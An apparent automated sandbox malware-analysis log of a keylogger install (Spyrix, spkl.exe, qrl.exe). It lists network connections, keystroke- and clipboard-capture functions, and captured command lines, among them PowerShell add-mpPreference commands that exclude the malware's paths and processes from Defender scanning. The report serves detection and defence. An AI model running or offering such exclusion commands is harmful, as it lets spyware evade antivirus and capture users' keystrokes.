Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.114.14.170:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.114.14.168:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49751 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 53_2_033C6312 OpenClipboard,

53_2_033C6312

Contains functionality to modify clipboard data

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 53_2_033C6342 SetClipboardData,

53_2_033C6342

Contains functionality to retrieve information about pressed keystrokes

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 53_2_033C6292 GetAsyncKeyState,

53_2_033C6292

Installs a raw input device (often for capturing keystrokes)

Source: spkl.exe, 00000035.00000003.2593935763.0000000007617000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_362380c0-f

System Summary

PE file has nameless sections

Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:

Uses regedit.exe to modify the Windows registry

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp

Process created: C:\Windows\SysWOW64\regedit.exe "regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1"

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\181531736511434'"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\181531736511434"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\181531736511434'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\181531736511434"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd

Contains functionality to call native functions

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 53_2_033C6252 NtdllDefWindowProc_A,

53_2_033C6252

Contains functionality to communicate with device drivers

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 53_2_033C5FFA: DeviceIoControl,

53_2_033C5FFA

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Code function: 6_2_02B3DC34	6_2_02B3DC34
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Code function: 6_2_051F6E90	6_2_051F6E90
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Code function: 6_2_051F0006	6_2_051F0006
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Code function: 6_2_051F0040	6_2_051F0040
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Code function: 6_2_051F6E60	6_2_051F6E60
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Code function: 6_2_051FD937	6_2_051FD937
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Code function: 6_2_051FD948	6_2_051FD948
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Code function: 6_2_0A2F2BF8	6_2_0A2F2BF8
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Code function: 6_2_0A2F00C0	6_2_0A2F00C0
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Code function: 6_2_0A2FAFC8	6_2_0A2FAFC8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033E6654	53_2_033E6654
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033FE88C	53_2_033FE88C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033F1D50	53_2_033F1D50
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033D110C	53_2_033D110C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033D0538	53_2_033D0538
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D2B890	67_2_00D2B890
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D220F0	67_2_00D220F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D1A132	67_2_00D1A132
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D8A140	67_2_00D8A140
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D34170	67_2_00D34170
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D1A132	67_2_00D1A132
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D80130	67_2_00D80130
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00F8A250	67_2_00F8A250
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D6A340	67_2_00D6A340
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D3F5D0	67_2_00D3F5D0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D3E590	67_2_00D3E590
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00F985B0	67_2_00F985B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D476C0	67_2_00D476C0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D666B0	67_2_00D666B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D336A0	67_2_00D336A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D20620	67_2_00D20620
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D6A7B0	67_2_00D6A7B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D29A20	67_2_00D29A20
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D88C20	67_2_00D88C20
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D1A132	67_2_00D1A132
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D26F90	67_2_00D26F90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D11F10	67_2_00D11F10
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01E90	69_3_01B01E90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01E90	69_3_01B01E90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01E90	69_3_01B01E90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01E90	69_3_01B01E90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01E90	69_3_01B01E90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01E90	69_3_01B01E90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01E90	69_3_01B01E90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01E90	69_3_01B01E90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01E90	69_3_01B01E90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 69_3_01B01CD4	69_3_01B01CD4

Found potential string decryption / allocating functions

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: String function: 033E565C appears 36 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00D46FB0 appears 179 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00D47140 appears 127 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00D23610 appears 43 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00D23380 appears 46 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00D13850 appears 34 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00D19DB0 appears 70 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00D19DE0 appears 31 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00F9D1E8 appears 58 times

PE file contains executable resources (Code or Archives)

Source: [space]= .tmp.18.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: [space]= .tmp.18.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-269PL.tmp.19.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-269PL.tmp.19.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-9ATRT.tmp.19.dr	Static PE information: Resource name: RT_BITMAP type: DOS executable (COM)
Source: is-9ATRT.tmp.19.dr	Static PE information: Resource name: RT_STRING type: COM executable for DOS
Source: is-9ATRT.tmp.19.dr	Static PE information: Resource name: RT_RCDATA type: COM executable for DOS

PE file contains more sections than normal

Source: is-IFJUI.tmp.19.dr	Static PE information: Number of sections : 18 > 10
Source: is-V94IU.tmp.19.dr	Static PE information: Number of sections : 11 > 10
Source: is-9ATRT.tmp.19.dr	Static PE information: Number of sections : 13 > 10
Source: ffws.exe.53.dr	Static PE information: Number of sections : 11 > 10
Source: is-JF90R.tmp.19.dr	Static PE information: Number of sections : 13 > 10

Uses reg.exe to modify the Windows registry

Source: C:\Windows\System32\cmd.exe

